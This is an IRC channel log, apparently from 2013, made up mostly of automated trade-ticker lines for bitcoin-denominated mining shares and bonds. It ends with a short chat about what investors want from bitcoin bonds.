BTC [-] Jun 15 17:31:36 [HAVELOCK] [ASICM] 18 @ 0.03 = 0.54 BTC [-] Jun 15 17:31:37 [HAVELOCK] [ASICM] 30 @ 0.03 = 0.9 BTC [-] Jun 15 17:31:38 [HAVELOCK] [ASICM] 151 @ 0.02976 = 4.4938 BTC [-] Jun 15 17:31:39 [HAVELOCK] [ASICM] 18 @ 0.02975 = 0.5355 BTC [-] Jun 15 17:35:47 peter is a whacko Jun 15 17:40:06 [MPEX] [S.MPOE] 7330 @ 0.00070457 = 5.1645 BTC [-] Jun 15 17:40:11 [MPEX] [S.MPOE] 2095 @ 0.0007054 = 1.4778 BTC [+] Jun 15 17:41:40 [BTCTC] [TAT.ASICMINER] 2 @ 0.029798 = 0.0596 BTC [+] Jun 15 17:43:07 [BTCTC] [DMS.MINING] 1 @ 0.02898 BTC [+] Jun 15 17:43:26 [BTCTC] [TAT.ASICMINER] 13 @ 0.0298 = 0.3874 BTC [+] Jun 15 17:45:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.0298 BTC [+] Jun 15 17:46:52 [BTCTC] [TAT.ASICMINER] 33 @ 0.0298 = 0.9834 BTC [+] Jun 15 17:50:46 [BTCTC] [ASICMINER-PT] 1 @ 2.9 BTC [-] Jun 15 17:50:50 [BTCTC] [ASICMINER-PT] 4 @ 2.9 = 11.6 BTC [-] Jun 15 17:51:05 [BTCTC] [TAT.ASICMINER] 17 @ 0.02935 = 0.499 BTC [-] Jun 15 17:51:05 [BTCTC] [TAT.ASICMINER] 22 @ 0.0293 = 0.6446 BTC [-] Jun 15 17:53:45 [BTCTC] [RSM] 10 @ 0.014 = 0.14 BTC [+] Jun 15 17:54:06 [MPEX] [S.MPOE] 5000 @ 0.00070373 = 3.5187 BTC [-] Jun 15 17:57:34 [BTCTC] [ASICMINER-PT] 2 @ 2.938 = 5.876 BTC [+] Jun 15 17:57:39 [BTCTC] [ASICMINER-PT] 1 @ 2.9389 BTC [+] Jun 15 17:59:43 [BTCTC] [TAT.ASICMINER] 114 @ 0.0293 = 3.3402 BTC [-] Jun 15 18:00:33 [BTCTC] [ASICMINER-PT] 6 @ 2.9 = 17.4 BTC [-] Jun 15 18:04:55 [BTCTC] [DMS.MINING] 50 @ 0.029949 = 1.4975 BTC [+] Jun 15 18:05:34 [HAVELOCK] [ASICM] 1 @ 0.0314 BTC [+] Jun 15 18:06:51 [BTCTC] [ASICMINER-PT] 10 @ 2.9 = 29 BTC [-] Jun 15 18:06:55 [BTCTC] [DMS.MINING] 46 @ 0.02995 = 1.3777 BTC [+] Jun 15 18:08:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.0292 BTC [-] Jun 15 18:12:12 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.007 BTC [+] Jun 15 18:16:26 [BTCTC] [TAT.ASICMINER] 2 @ 0.029101 = 0.0582 BTC [-] Jun 15 18:17:12 [BTCTC] [TAT.ASICMINER] 7 @ 0.0291 = 0.2037 BTC [-] Jun 15 18:17:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.0291 BTC [-] Jun 15 18:17:32 [BTCTC] [DMS.MINING] 1 @ 0.029959 BTC [+] Jun 15 18:17:33 [BTCTC] [DMS.MINING] 8 @ 0.029959 = 0.2397 BTC [+] Jun 15 18:21:41 [BTCTC] [BASIC-MINING] 1 @ 0.679301 BTC [+] Jun 15 18:23:18 [BTCTC] [ASICMINER-PT] 1 @ 2.938 BTC [+] Jun 15 18:24:31 [BTCTC] [DMS.PURCHASE] 24 @ 0.066231 = 1.5895 BTC [-] Jun 15 18:27:27 [HAVELOCK] [ASICM] 18 @ 0.0312 = 0.5616 BTC [-] Jun 15 18:28:04 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.007 = 0.07 BTC [+] Jun 15 18:29:04 [HAVELOCK] [ASICM] 75 @ 0.03125 = 2.3438 BTC [+] Jun 15 18:32:23 [BTCTC] [ASICMINER-PT] 1 @ 2.938 BTC [+] Jun 15 18:33:38 [BTCTC] [TAT.ASICMINER] 2 @ 0.029799 = 0.0596 BTC [+] Jun 15 18:36:02 [BTCTC] [TAT.VIRTUALMINE] 8 @ 0.007 = 0.056 BTC [+] Jun 15 18:36:34 [BTCTC] [ASICMINER-PT] 1 @ 2.938 BTC [+] Jun 15 18:36:36 [BTCTC] [ASICMINER-PT] 1 @ 2.9385 BTC [+] Jun 15 18:43:34 [BTCTC] [TAT.VIRTUALMINE] 38 @ 0.0069 = 0.2622 BTC [-] Jun 15 18:44:27 [BITFUNDER] [TAT.VIRTUALMINE] [PAID] 123,500 @ 0.00003223 Jun 15 18:45:25 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.006999 = 0.14 BTC [+] Jun 15 18:45:32 [BTCTC] [TAT.VIRTUALMINE] 66 @ 0.007 = 0.462 BTC [+] Jun 15 18:45:33 [BTCTC] [BASIC-MINING] 1 @ 0.68499 BTC [+] Jun 15 18:45:57 [BTCTC] [BASIC-MINING] 4 @ 0.69 = 2.76 BTC [+] Jun 15 18:47:00 [BTCTC] [BASIC-MINING] 1 @ 0.699 BTC [+] Jun 15 18:47:24 [BTCTC] [BASIC-MINING] 1 @ 0.699 BTC [+] Jun 15 18:48:48 [BTCTC] [RSM] 30 @ 0.014 = 0.42 BTC [+] Jun 15 18:48:50 [BTCTC] [RSM] 1 @ 0.014 BTC [+] Jun 15 18:49:25 [BTCTC] [RSM] 40 @ 0.01489 = 0.5956 BTC [+] Jun 15 18:52:07 [BTCTC] [TAT.ASICMINER] 2 @ 0.0298 = 0.0596 BTC [+] Jun 15 18:59:53 [BTCTC] [TAT.ASICMINER] 2 @ 0.029101 = 0.0582 BTC [-] Jun 15 18:59:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.029101 BTC [-] Jun 15 19:00:32 [BTCTC] [TAT.ASICMINER] 7 @ 0.0291 = 0.2037 BTC [-] Jun 15 19:01:07 [HAVELOCK] [HIM] 2 @ 0.292 = 0.584 BTC [-] Jun 15 19:01:09 [HAVELOCK] [SDICE] 22 @ 0.1901 = 4.1822 BTC [-] Jun 15 19:02:30 [BTCTC] [DMS.MINING] 5 @ 0.02905 = 0.1453 BTC [-] Jun 15 19:02:37 [BTCTC] [DMS.MINING] 9 @ 0.029968 = 0.2697 BTC [+] Jun 15 19:02:40 [HAVELOCK] [ASICM] 72 @ 0.031 = 2.232 BTC [-] Jun 15 19:02:48 ;;genrate 12500 Jun 15 19:02:48 The expected generation output, at 12500.0 Mhps, given difficulty of 15605632.6813, is 0.402824517517 BTC per day and 0.0167843548965 BTC per hour. Jun 15 19:02:55 [BTCTC] [DMS.MINING] 2 @ 0.029968 = 0.0599 BTC [+] Jun 15 19:03:51 [BTCTC] [DMS.MINING] 6 @ 0.02905 = 0.1743 BTC [-] Jun 15 19:03:53 [BTCTC] [DMS.MINING] 5 @ 0.02901 = 0.1451 BTC [-] Jun 15 19:03:55 [BTCTC] [DMS.MINING] 15 @ 0.029001 = 0.435 BTC [-] Jun 15 19:04:24 [HAVELOCK] [ASICM] 132 @ 0.031 = 4.092 BTC [-] Jun 15 19:04:26 [BTCTC] [DMS.MINING] 5 @ 0.029001 = 0.145 BTC [-] Jun 15 19:04:51 [BTCTC] [DMS.MINING] 9 @ 0.02898 = 0.2608 BTC [-] Jun 15 19:05:01 [BTCTC] [DMS.MINING] 4 @ 0.029968 = 0.1199 BTC [+] Jun 15 19:13:01 [BTCTC] [DMS.PURCHASE] 50 @ 0.066116 = 3.3058 BTC [-] Jun 15 19:13:13 [BTCTC] [DMS.PURCHASE] 7 @ 0.066116 = 0.4628 BTC [-] Jun 15 19:16:32 [BTCTC] [TAT.ASICMINER] 2 @ 0.0293 = 0.0586 BTC [+] Jun 15 19:17:45 [BTCTC] [TAT.ASICMINER] 69 @ 0.0293 = 2.0217 BTC [+] Jun 15 19:18:58 [HAVELOCK] [ASICM] 31 @ 0.03244 = 1.0056 BTC [+] Jun 15 19:20:52 [BTCTC] [DMS.SELLING] 1 @ 0.038987 BTC [+] Jun 15 19:21:23 [HAVELOCK] [ASICM] 35 @ 0.0315 = 1.1025 BTC [-] Jun 15 19:21:44 [BTCTC] [DMS.PURCHASE] 5 @ 0.066116 = 0.3306 BTC [-] Jun 15 19:23:17 [BTCTC] [ASICMINER-PT] 1 @ 2.934 BTC [-] Jun 15 19:23:54 [BTCTC] [ASICMINER-PT] 1 @ 2.934 BTC [-] Jun 15 19:24:13 [BTCTC] [ASICMINER-PT] 2 @ 2.935 = 5.87 BTC [+] Jun 15 19:26:40 [BTCTC] [DMS.PURCHASE] 5 @ 0.066116 = 0.3306 BTC [-] Jun 15 19:27:43 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.006999 = 0.014 BTC [-] Jun 15 19:30:35 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.006999 = 0.07 BTC [-] Jun 15 19:32:17 [BTCTC] [TAT.VIRTUALMINE] 15 @ 0.006999 = 0.105 BTC [-] Jun 15 19:32:34 [BTCTC] [ESECURITYSABTC] 1 @ 0.176 BTC [-] Jun 15 19:32:39 [BTCTC] [ESECURITYSABTC] 1 @ 0.15501 BTC [-] Jun 15 19:32:45 [BTCTC] [ESECURITYSABTC] 1 @ 0.155 BTC [-] Jun 15 19:35:02 [BTCTC] [ESECURITYSABTC] 4 @ 0.155 = 0.62 BTC [-] Jun 15 19:35:03 ;;ticker Jun 15 19:35:04 [BTCTC] [ESECURITYSABTC] 1 @ 0.15 BTC [-] Jun 15 19:35:06 BTCUSD ticker | Best bid: 101.64001, Best ask: 101.98999, Bid-ask spread: 0.34998, Last trade: 102.00000, 24 hour volume: 24213.35217549, 24 hour low: 97.50000, 24 hour high: 103.70000, 24 hour vwap: 100.41468 Jun 15 19:35:22 [BTCTC] [TAT.VIRTUALMINE] 13 @ 0.006999 = 0.091 BTC [-] Jun 15 19:35:53 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.006999 BTC [-] Jun 15 19:37:36 [BTCTC] [DMS.PURCHASE] 95 @ 0.066116 = 6.281 BTC [-] Jun 15 19:41:32 [BTCTC] [DMS.MINING] 10 @ 0.0286 = 0.286 BTC [-] Jun 15 19:42:08 [BTCTC] [DMS.MINING] 4 @ 0.0285 = 0.114 BTC [-] Jun 15 19:44:10 [BTCTC] [ASICMINER-PT] 1 @ 2.929 BTC [-] Jun 15 19:47:28 [HAVELOCK] [ASICM] 18 @ 0.03199 = 0.5758 BTC [+] Jun 15 19:50:44 [HAVELOCK] [ASICM] 7 @ 0.03199 = 0.2239 BTC [+] Jun 15 19:52:03 [HAVELOCK] [ASICM] 17 @ 0.032 = 0.544 BTC [+] Jun 15 19:52:40 [HAVELOCK] [ASICM] 100 @ 0.032 = 3.2 BTC [+] Jun 15 19:53:05 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.006999 = 0.07 BTC [-] Jun 15 19:54:22 [HAVELOCK] [ASICM] 10 @ 0.03199 = 0.3199 BTC [-] Jun 15 19:54:24 [HAVELOCK] [ASICM] 15 @ 0.032 = 0.48 BTC [+] Jun 15 19:57:03 [BTCTC] [DMS.PURCHASE] 5 @ 0.066116 = 0.3306 BTC [-] Jun 15 19:58:50 [HAVELOCK] [ASICM] 75 @ 0.032 = 2.4 BTC [+] Jun 15 20:06:05 [BTCTC] [ASICMINER-PT] 1 @ 2.929 BTC [-] Jun 15 20:07:33 [HAVELOCK] [ASICM] 10 @ 0.0311 = 0.311 BTC [-] Jun 15 20:07:35 [HAVELOCK] [ASICM] 8 @ 0.031 = 0.248 BTC [-] Jun 15 20:07:36 [HAVELOCK] [ASICM] 1 @ 0.03 BTC [-] Jun 15 20:07:37 [HAVELOCK] [ASICM] 27 @ 0.03 = 0.81 BTC [-] Jun 15 20:07:38 [HAVELOCK] [ASICM] 100 @ 0.03 = 3 BTC [-] Jun 15 20:07:39 [HAVELOCK] [ASICM] 1 @ 0.0299 BTC [-] Jun 15 20:07:40 [HAVELOCK] [ASICM] 13 @ 0.02985 = 0.3881 BTC [-] Jun 15 20:09:03 [BTCTC] [ASICMINER-PT] 2 @ 2.929 = 5.858 BTC [-] Jun 15 20:15:18 [BTCTC] [DMS.MINING] 14 @ 0.028201 = 0.3948 BTC [-] Jun 15 20:15:19 [BTCTC] [DMS.MINING] 15 @ 0.0282 = 0.423 BTC [-] Jun 15 20:15:20 [BTCTC] [DMS.MINING] 100 @ 0.02813 = 2.813 BTC [-] Jun 15 20:15:24 [HAVELOCK] [ASICM] 37 @ 0.03199 = 1.1836 BTC [+] Jun 15 20:15:51 [HAVELOCK] [ASICM] 13 @ 0.03199 = 0.4159 BTC [+] Jun 15 20:18:22 [HAVELOCK] [ASICM] 1 @ 0.03 BTC [-] Jun 15 20:21:18 [BTCTC] [DMS.MINING] 9 @ 0.0281 = 0.2529 BTC [-] Jun 15 20:21:37 [BTCTC] [DMS.MINING] 8 @ 0.02791 = 0.2233 BTC [-] Jun 15 20:22:58 [BTCTC] [DMS.PURCHASE] 13 @ 0.066116 = 0.8595 BTC [-] Jun 15 20:27:49 furuknap hey, how's teh 100th coming along ? Jun 15 20:29:03 [HAVELOCK] [ASICM] 1 @ 0.031 BTC [+] Jun 15 20:31:59 [HAVELOCK] [ASICM] 27 @ 0.03191 = 0.8616 BTC [+] Jun 15 20:33:14 [BTCTC] [ASICMINER-PT] 1 @ 2.896001 BTC [-] Jun 15 20:33:16 [BTCTC] [ASICMINER-PT] 5 @ 2.896 = 14.48 BTC [-] Jun 15 20:33:19 [BTCTC] [ASICMINER-PT] 1 @ 2.896 BTC [-] Jun 15 20:33:54 who's furuknap ? Jun 15 20:35:21 some new guy with an interest in mining Jun 15 20:37:28 [BTCTC] [DMS.MINING] 17 @ 0.02792 = 0.4746 BTC [+] Jun 15 20:37:30 [BTCTC] [DMS.MINING] 2 @ 0.02791 = 0.0558 BTC [-] Jun 15 20:37:32 [BTCTC] [DMS.MINING] 5 @ 0.02776 = 0.1388 BTC [-] Jun 15 20:37:35 [BTCTC] [DMS.MINING] 10 @ 0.027661 = 0.2766 BTC [-] Jun 15 20:38:56 [BTCTC] [DMS.MINING] 104 @ 0.02702 = 2.8101 BTC [-] Jun 15 20:39:59 [BTCTC] [ASICMINER-PT] 1 @ 2.92899 BTC [+] Jun 15 20:40:12 [BTCTC] [DMS.PURCHASE] 42 @ 0.066116 = 2.7769 BTC [-] Jun 15 20:40:43 [HAVELOCK] [ASICM] 10 @ 0.0316 = 0.316 BTC [-] Jun 15 20:41:56 [HAVELOCK] [SDICE] 1 @ 0.1901 BTC [-] Jun 15 20:45:52 [BTCTC] [BTC-BOND] 6 @ 0.009994 = 0.06 BTC [+] Jun 15 20:46:42 [BTCTC] [ASICMINER-PT] 1 @ 2.892 BTC [-] Jun 15 20:46:43 [BTCTC] [BTC-BOND] 13 @ 0.009995 = 0.1299 BTC [+] Jun 15 20:48:18 [BTCTC] [ASICMINER-PT] 1 @ 2.926 BTC [+] Jun 15 20:54:59 [BTCTC] [TAT.ASICMINER] 8 @ 0.02936 = 0.2349 BTC [+] Jun 15 20:55:01 [BTCTC] [TAT.ASICMINER] 36 @ 0.02935 = 1.0566 BTC [-] Jun 15 20:58:27 [BTCTC] [RSM] 134 @ 0.01489 = 1.9953 BTC [+] Jun 15 20:58:29 [BTCTC] [ASICMINER-PT] 1 @ 2.902 BTC [-] Jun 15 20:58:29 [BTCTC] [RSM] 729 @ 0.0149 = 10.8621 BTC [+] Jun 15 20:58:31 [BTCTC] [ASICMINER-PT] 1 @ 2.9 BTC [-] Jun 15 20:59:08 [BTCTC] [ASICMINER-PT] 1 @ 2.9 BTC [-] Jun 15 20:59:50 [BTCTC] [DMS.MINING] 9 @ 0.028999 = 0.261 BTC [+] Jun 15 21:00:34 [BTCTC] [DMS.MINING] 8 @ 0.0275 = 0.22 BTC [-] Jun 15 21:00:35 [BTCTC] [DMS.MINING] 5 @ 0.0265 = 0.1325 BTC [-] Jun 15 21:01:51 [BTCTC] [DMS.SELLING] 3 @ 0.03899 = 0.117 BTC [+] Jun 15 21:02:13 [BTCTC] [DMS.SELLING] 5 @ 0.03953 = 0.1977 BTC [+] Jun 15 21:02:20 [BTCTC] [ASICMINER-PT] 1 @ 2.922 BTC [+] Jun 15 21:02:22 [BTCTC] [ASICMINER-PT] 3 @ 2.923 = 8.769 BTC [+] Jun 15 21:02:23 [BTCTC] [ASICMINER-PT] 1 @ 2.925 BTC [+] Jun 15 21:02:25 [BTCTC] [ASICMINER-PT] 4 @ 2.926 = 11.704 BTC [+] Jun 15 21:02:36 [BTCTC] [DMS.SELLING] 1 @ 0.039544 BTC [+] Jun 15 21:07:04 [BTCTC] [DMS.MINING] 10 @ 0.028998 = 0.29 BTC [+] Jun 15 21:07:10 [BTCTC] [DMS.MINING] 116 @ 0.028999 = 3.3639 BTC [+] Jun 15 21:07:13 [BTCTC] [DMS.MINING] 20 @ 0.029799 = 0.596 BTC [+] Jun 15 21:07:13 [BTCTC] [DMS.MINING] 101 @ 0.029889 = 3.0188 BTC [+] Jun 15 21:07:14 [BTCTC] [DMS.MINING] 5 @ 0.0302 = 0.151 BTC [+] Jun 15 21:07:16 [BTCTC] [DMS.MINING] 21 @ 0.030239 = 0.635 BTC [+] Jun 15 21:07:18 [BTCTC] [DMS.MINING] 25 @ 0.03026 = 0.7565 BTC [+] Jun 15 21:07:29 [BTCTC] [DMS.MINING] 22 @ 0.030278 = 0.6661 BTC [+] Jun 15 21:07:39 [BTCTC] [DMS.MINING] 60 @ 0.030279 = 1.8167 BTC [+] Jun 15 21:07:40 [BTCTC] [DMS.MINING] 70 @ 0.03029 = 2.1203 BTC [+] Jun 15 21:07:41 [BTCTC] [DMS.MINING] 50 @ 0.030496 = 1.5248 BTC [+] Jun 15 21:08:38 [BTCTC] [PAJKA.BOND] 19 @ 0.087996 = 1.6719 BTC [-] Jun 15 21:08:40 [BTCTC] [PAJKA.BOND] 231 @ 0.087997 = 20.3273 BTC [+] Jun 15 21:11:47 [BTCTC] [TAT.ASICMINER] 10 @ 0.0296 = 0.296 BTC [+] Jun 15 21:11:49 [BTCTC] [TAT.ASICMINER] 10 @ 0.029649 = 0.2965 BTC [+] Jun 15 21:12:58 [BTCTC] [TAT.VIRTUALMINE] 149 @ 0.006999 = 1.0429 BTC [-] Jun 15 21:12:59 [BTCTC] [TAT.VIRTUALMINE] 80 @ 0.006999 = 0.5599 BTC [-] Jun 15 21:13:02 [BTCTC] [TAT.VIRTUALMINE] 209 @ 0.007 = 1.463 BTC [+] Jun 15 21:13:04 [BTCTC] [TAT.VIRTUALMINE] 562 @ 0.007 = 3.934 BTC [+] Jun 15 21:21:10 [BTCTC] [DMS.PURCHASE] 100 @ 0.066116 = 6.6116 BTC [-] Jun 15 21:21:56 [BTCTC] [ASICMINER-PT] 1 @ 2.9 BTC [-] Jun 15 21:23:16 [BTCTC] [ASICMINER-PT] 2 @ 2.9 = 5.8 BTC [-] Jun 15 21:23:37 [HAVELOCK] [ASICM] 3 @ 0.030511 = 0.0915 BTC [-] Jun 15 21:23:38 [HAVELOCK] [ASICM] 7 @ 0.0305 = 0.2135 BTC [-] Jun 15 21:23:39 [HAVELOCK] [ASICM] 2 @ 0.03002 = 0.06 BTC [-] Jun 15 21:23:40 [HAVELOCK] [ASICM] 38 @ 0.03001 = 1.1404 BTC [-] Jun 15 21:24:42 [HAVELOCK] [ASICM] 2 @ 0.02985 = 0.0597 BTC [-] Jun 15 21:24:44 [HAVELOCK] [ASICM] 28 @ 0.0296 = 0.8288 BTC [-] Jun 15 21:24:45 [HAVELOCK] [ASICM] 1 @ 0.0295 BTC [-] Jun 15 21:25:44 [BTCTC] [GSDPT] 13 @ 0.002723 = 0.0354 BTC [-] Jun 15 21:25:46 [BTCTC] [GSDPT] 292 @ 0.002724 = 0.7954 BTC [+] Jun 15 21:25:48 [BTCTC] [GSDPT] 156 @ 0.002725 = 0.4251 BTC [+] Jun 15 21:25:50 [BTCTC] [GSDPT] 14 @ 0.00273 = 0.0382 BTC [+] Jun 15 21:25:55 [BTCTC] [GSDPT] 20 @ 0.002749 = 0.055 BTC [+] Jun 15 21:25:59 [BTCTC] [GSDPT] 10 @ 0.002897 = 0.029 BTC [+] Jun 15 21:26:05 [BTCTC] [TAT.ASICMINER] 5 @ 0.02936 = 0.1468 BTC [-] Jun 15 21:26:07 [BTCTC] [GSDPT] 100 @ 0.002998 = 0.2998 BTC [+] Jun 15 21:26:08 [BTCTC] [GSDPT] 4 @ 0.0031 = 0.0124 BTC [+] Jun 15 21:26:09 [BTCTC] [TAT.ASICMINER] 13 @ 0.02935 = 0.3816 BTC [-] Jun 15 21:26:11 [BTCTC] [GSDPT] 200 @ 0.00312 = 0.624 BTC [+] Jun 15 21:26:12 [BTCTC] [GSDPT] 154 @ 0.00315 = 0.4851 BTC [+] Jun 15 21:26:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.0293 BTC [-] Jun 15 21:26:15 [BTCTC] [GSDPT] 37 @ 0.00318 = 0.1177 BTC [+] Jun 15 21:26:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.0292 BTC [-] Jun 15 21:26:18 [BTCTC] [TAT.ASICMINER] 3 @ 0.029101 = 0.0873 BTC [-] Jun 15 21:27:16 [BTCTC] [S.DICE-PT] 1 @ 0.002899 BTC [+] Jun 15 21:27:17 [BTCTC] [S.DICE-PT] 50 @ 0.0029 = 0.145 BTC [+] Jun 15 21:27:38 [BTCTC] [BTC-BOND] 22 @ 0.009995 = 0.2199 BTC [+] Jun 15 21:27:39 [BTCTC] [BTC-BOND] 10 @ 0.009995 = 0.1 BTC [+] Jun 15 21:27:41 [BTCTC] [BTC-BOND] 123 @ 0.009996 = 1.2295 BTC [+] Jun 15 21:27:42 [BTCTC] [BTC-BOND] 10 @ 0.009996 = 0.1 BTC [+] Jun 15 21:27:44 [BTCTC] [BTC-BOND] 29 @ 0.009997 = 0.2899 BTC [+] Jun 15 21:27:45 [BTCTC] [BTC-BOND] 806 @ 0.009998 = 8.0584 BTC [+] Jun 15 21:28:52 [BTCTC] [S.DICE-PT] 1 @ 0.003008 BTC [+] Jun 15 21:28:55 [BTCTC] [S.DICE-PT] 30 @ 0.0031 = 0.093 BTC [+] Jun 15 21:29:04 [BTCTC] [DMS.PURCHASE] 20 @ 0.066116 = 1.3223 BTC [-] Jun 15 21:29:23 [BTCTC] [S.DICE-PT] 2 @ 0.0031 = 0.0062 BTC [+] Jun 15 21:29:27 [BTCTC] [S.DICE-PT] 10 @ 0.003149 = 0.0315 BTC [+] Jun 15 21:30:04 [BTCTC] [S.DICE-PT] 1 @ 0.00315 BTC [+] Jun 15 21:30:05 [BTCTC] [S.DICE-PT] 15 @ 0.003165 = 0.0475 BTC [+] Jun 15 21:30:54 [HAVELOCK] [ASICM] 1 @ 0.02931 BTC [-] Jun 15 21:30:56 [HAVELOCK] [ASICM] 49 @ 0.029221 = 1.4318 BTC [-] Jun 15 21:30:57 [HAVELOCK] [ASICM] 7 @ 0.0291 = 0.2037 BTC [-] Jun 15 21:30:58 [HAVELOCK] [ASICM] 11 @ 0.02900002 = 0.319 BTC [-] Jun 15 21:30:59 [HAVELOCK] [ASICM] 1000 @ 0.02900001 = 29 BTC [-] Jun 15 21:31:00 [HAVELOCK] [ASICM] 332 @ 0.029 = 9.628 BTC [-] Jun 15 21:34:36 [BTCTC] [DMS.SELLING] 15 @ 0.038 = 0.57 BTC [-] Jun 15 21:35:01 [BTCTC] [ASICMINER-PT] 1 @ 2.899999 BTC [-] Jun 15 21:35:56 [BTCTC] [DMS.PURCHASE] 10 @ 0.066116 = 0.6612 BTC [-] Jun 15 21:35:58 [BTCTC] [ESECURITYSABTC] 7 @ 0.269999 = 1.89 BTC [+] Jun 15 21:36:02 [BTCTC] [ESECURITYSABTC] 1 @ 0.27 BTC [+] Jun 15 21:36:04 [BTCTC] [ESECURITYSABTC] 1 @ 0.271 BTC [+] Jun 15 21:36:06 [BTCTC] [ESECURITYSABTC] 4 @ 0.2985 = 1.194 BTC [+] Jun 15 21:36:07 [BTCTC] [ESECURITYSABTC] 1 @ 0.2999 BTC [+] Jun 15 21:36:10 [BTCTC] [ESECURITYSABTC] 1 @ 0.3 BTC [+] Jun 15 21:36:11 [BTCTC] [ESECURITYSABTC] 1 @ 0.315 BTC [+] Jun 15 21:36:13 [BTCTC] [ESECURITYSABTC] 3 @ 0.32 = 0.96 BTC [+] Jun 15 21:36:14 [BTCTC] [ESECURITYSABTC] 1 @ 0.325 BTC [+] Jun 15 21:39:39 [BTCTC] [ASICMINER-PT] 1 @ 2.87 BTC [-] Jun 15 21:42:04 [HAVELOCK] [ASICM] 1 @ 0.0295 BTC [+] Jun 15 21:45:25 [HAVELOCK] [ASICM] 37 @ 0.0295 = 1.0915 BTC [+] Jun 15 21:45:43 [BTCTC] [DMS.PURCHASE] 5 @ 0.066116 = 0.3306 BTC [-] Jun 15 21:46:39 [BTCTC] [ASICMINER-PT] 1 @ 2.88 BTC [+] Jun 15 21:46:41 [BTCTC] [ASICMINER-PT] 16 @ 2.899999 = 46.4 BTC [+] Jun 15 21:47:37 [HAVELOCK] [ASICM] 1 @ 0.0295 BTC [+] Jun 15 21:47:44 [BTCTC] [ASICMINER-PT] 8 @ 2.899999 = 23.2 BTC [+] Jun 15 21:48:27 [BTCTC] [DMS.MINING] 2 @ 0.03 = 0.06 BTC [-] Jun 15 21:49:58 [HAVELOCK] [ASICM] 41 @ 0.029 = 1.189 BTC [-] Jun 15 21:50:09 [HAVELOCK] [ASICM] 6 @ 0.02875003 = 0.1725 BTC [-] Jun 15 21:50:22 [HAVELOCK] [ASICM] 1 @ 0.0285 BTC [-] Jun 15 21:50:24 [BTCTC] [ASICMINER-PT] 6 @ 2.9 = 17.4 BTC [+] Jun 15 21:50:31 [HAVELOCK] [ASICM] 9 @ 0.02815 = 0.2534 BTC [-] Jun 15 21:50:46 [HAVELOCK] [ASICM] 907 @ 0.02810001 = 25.4867 BTC [-] Jun 15 21:51:11 [BTCTC] [TAT.ASICMINER] 3 @ 0.029 = 0.087 BTC [-] Jun 15 21:51:14 [BTCTC] [TAT.ASICMINER] 15 @ 0.029 = 0.435 BTC [-] Jun 15 21:51:18 [HAVELOCK] [ASICM] 284 @ 0.0281 = 7.9804 BTC [-] Jun 15 21:58:13 [BTCTC] [DMS.PURCHASE] 10 @ 0.066116 = 0.6612 BTC [-] Jun 15 21:59:03 [MPEX] [S.MPOE] 876 @ 0.00070373 = 0.6165 BTC [-] Jun 15 21:59:04 [MPEX] [S.MPOE] 4224 @ 0.00070106 = 2.9613 BTC [-] Jun 15 22:03:36 https://bitcointalk.org/index.php?topic=232007.msg2484191#msg2484191 Jun 15 22:03:37 win Jun 15 22:05:58 [HAVELOCK] [SDICE] 4 @ 0.18889999 = 0.7556 BTC [-] Jun 15 22:06:51 [BTCTC] [DMS.SELLING] 6 @ 0.038671 = 0.232 BTC [+] Jun 15 22:06:52 [BTCTC] [DMS.SELLING] 8 @ 0.0391 = 0.3128 BTC [+] Jun 15 22:09:07 [MPEX] [S.MPOE] 255 @ 0.0007054 = 0.1799 BTC [+] Jun 15 22:09:08 [MPEX] [S.MPOE] 2000 @ 0.0007054 = 1.4108 BTC [+] Jun 15 22:09:22 [MPEX] [S.MPOE] 4545 @ 0.00070541 = 3.2061 BTC [+] Jun 15 22:10:02 [BTCTC] [DMS.MINING] 4 @ 0.0299 = 0.1196 BTC [-] Jun 15 22:13:02 [HAVELOCK] [HIM] 4 @ 0.3024 = 1.2096 BTC [+] Jun 15 22:13:29 [HAVELOCK] [ASICM] 6 @ 0.02887 = 0.1732 BTC [+] Jun 15 22:14:06 [HAVELOCK] [ASICM] 94 @ 0.0295 = 2.773 BTC [+] Jun 15 22:14:39 [HAVELOCK] [HIM] 2 @ 0.3049 = 0.6098 BTC [+] Jun 15 22:15:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.0291 BTC [+] Jun 15 22:16:05 [HAVELOCK] [ASICM] 4 @ 0.0294999 = 0.118 BTC [-] Jun 15 22:16:06 [HAVELOCK] [ASICM] 3 @ 0.0295 = 0.0885 BTC [+] Jun 15 22:23:55 [BTCTC] [ASICMINER-PT] 2 @ 2.899 = 5.798 BTC [-] Jun 15 22:23:56 [BTCTC] [ASICMINER-PT] 1 @ 2.8998 BTC [+] Jun 15 22:30:59 Open question: What do you look for in a bitcoin bond, and what do you think is missing from current bonds available? Jun 15 22:31:49 [BTCTC] [DMS.PURCHASE] 150 @ 0.066116 = 9.9174 BTC [-] Jun 15 22:32:09 trust. Jun 15 22:32:20 currently a bunch of nobodies are issuing paper they call bonds. that's not what bonds are. Jun 15 22:32:27 bonds are issued by specialists with experience and backing. Jun 15 22:32:49 gigavps had the backing but not the experience. it went in the toilet. Jun 15 22:33:01 well i want to do one right Jun 15 22:33:01 patrick harnett had (presumably) the experience, but not the backing. it went in the toilet. Jun 15 22:33:05 you can't. Jun 15 22:33:09 why Jun 15 22:33:16 because you don't have the backing or the experience. Jun 15 22:33:54 i have never issued a bond before correct, but the backing can be provided Jun 15 22:33:58 k Jun 15 22:34:15 experience means decades. Jun 15 22:34:19 backing means millions. Jun 15 22:34:29 neither "can be provided", it's not for sale and its not outsourceable. Jun 15 22:34:33 even if i'm not raising millions? Jun 15 22:34:41 if you're not raising millions its not a bond. Jun 15 22:35:00 a loan then? Jun 15 22:35:04 well sure. Jun 15 22:36:09 i have no idea what people in the loan business are looking for. from what i gather it's postcount maybe ? Jun 15 22:36:29 but your open question is quite acute. i have ~9k of stale capital right now which i can't sanely keep in a bond till i need it. Jun 15 22:36:31 so it sits. Jun 15 22:42:47 http://static.tapastic.com/cartoons/14/9c/e2/11/1f990b751e464d7ca6bdb4a55961a4c1.gif 